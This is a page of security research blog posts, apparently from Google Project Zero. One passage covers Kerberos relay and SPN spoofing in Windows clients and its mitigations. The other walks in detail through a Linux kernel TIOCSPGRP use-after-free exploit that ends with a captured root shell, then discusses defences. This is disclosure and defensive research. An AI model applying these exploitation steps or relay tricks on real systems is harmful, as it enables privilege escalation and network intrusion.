By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be something usable cross platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built manually based on the canonical name based on the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. This will usually return an address record alongside, all this does is change the server resolution process which doesn't seem to give any advantages to exploitation.

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled so that the server won't accidentally auto-detect the signing capability enabled for the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work, however even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as this potentially gives a way of spoofing a hostname which is distinct from the real target service, but when processed by the SSPI API requests the spoofed service ticket. As in if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and if the client appends a service class to the name and passes it to SSPI it will get a service ticket for fileserver, however the DNS resolving can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid, the last 6 characters is an encoded length of the entire marshaled buffer and the buffer is prefixed with a 28 byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way that the name could be invalid is by it being converted to lowercase. DNS is case insensitive, however generally the servers are case preserving. Therefore you could lookup the case sensitive name and the DNS server would return that unmodified. However the HTTP clients tested all seem to lowercase the hostname before use, therefore by the time it's used to build an SPN it's now a different string. When unmarshalling 'a' and 'A' represent different binary values and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered then it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers such as SMB and IIS with EPA can be configured to validate the SPN. If this request attribute flag is set then while the authentication will succeed when the server goes to check the SPN, it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

‚úáGoogle Project Zero

How a simple Linux kernel memory corruption bug can lead to complete system compromise

By: Ryan ‚ÄĒ

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
spinlock_t ctrl_lock;
[...]
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
[...]
struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal . You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
* tiocgpgrp - get process group
* @tty: tty passed by user
* @real_tty: tty side of the tty passed by the user if a pty else the tty
* @p: returned pid
*
* Obtain the process group of the tty. If there is no process group
* return an error.
*
* Locking: none. Reference to current->signal->tty is safe.
*/
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pid;
int ret;
/*
* (tty == real_tty) is a cheap way of
* testing if the tty is NOT a master pty.
*/
if (tty == real_tty && current->signal->tty != real_tty)
return -ENOTTY;
pid = tty_get_pgrp(real_tty);
ret = put_user(pid_vnr(pid), p);
put_pid(pid);
return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
* tiocspgrp - attempt to set process group
* @tty: tty passed by user
* @real_tty: tty side device matching tty passed by user
* @p: pid pointer
*
* Set the process group of the tty to the session passed. Only
* permitted where the tty session is our session.
*
* Locking: RCU, ctrl lock
*/
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pgrp;
pid_t pgrp_nr;
[...]
if (get_user(pgrp_nr, p))
return -EFAULT;
[...]
pgrp = find_vpid(pgrp_nr);
[...]
spin_lock_irq(&tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(A)
real_tty->pgrp = get_pid(B)
spin_unlock_irq(...) spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(B)
real_tty->pgrp = get_pid(A)
spin_unlock_irq(...) spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
goto out_unlock;
retval = 0;
- spin_lock_irq(&tty->ctrl_lock);
+ spin_lock_irq(&real_tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
- spin_unlock_irq(&tty->ctrl_lock);
+ spin_unlock_irq(&real_tty->ctrl_lock);
out_unlock:
rcu_read_unlock();
return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
int nr;
struct pid_namespace *ns;
};

struct pid
{
atomic_t count;
unsigned int level;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct rcu_head rcu;
struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
struct pid_namespace *ns;

if (!pid)
return;

ns = pid->numbers[pid->level].ns;
if ((atomic_read(&pid->count) == 1) ||
atomic_dec_and_test(&pid->count)) {
kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);
}
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

[email protected]:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
[email protected]:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb 6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb 6 00:09 seq_file -> :A-0000128
[email protected]:/sys/kernel/slab#

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset pid eventpoll_epi / epitem (RCU-freed) seq_file
0x00 count.counter (4) (CONTROL) rbn.__rb_parent_color (8) (TARGET?) buf (8) (TARGET?)
0x04 level (4)
0x08 tasks[PIDTYPE_PID] (8) rbn.rb_right (8) / rcu.func (8) size (8)
0x10 tasks[PIDTYPE_TGID] (8) rbn.rb_left (8) from (8)
0x18 tasks[PIDTYPE_PGID] (8) rdllink.next (8) count (8)
0x20 tasks[PIDTYPE_SID] (8) rdllink.prev (8) pad_until (8)
0x28 rcu.next (8) next (8) index (8)
0x30 rcu.func (8) ffd.file (8) read_pos (8)
0x38 numbers[0].nr (4) ffd.fd (4) version (8)
0x3c [hole] (4) nwait (4)
0x40 numbers[0].ns (8) pwqlist.next (8) lock (0x20): counter (8)
0x48 --- pwqlist.prev (8)
0x50 --- ep (8)
0x58 --- fllink.next (8)
0x60 --- fllink.prev (8) op (8)
0x68 --- ws (8) poll_event (4)
0x6c --- [hole] (4)
0x70 --- event.events (4) file (8)
0x74 --- event.data (8) (CONTROL)
0x78 --- private (8) (TARGET?)
0x7c --- ---
0x80 --- --- ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable: PTE | PTE | PTE | PTE | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

[email protected]:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
[email protected]:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
[email protected]:/home/user/tiocspgrp#

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

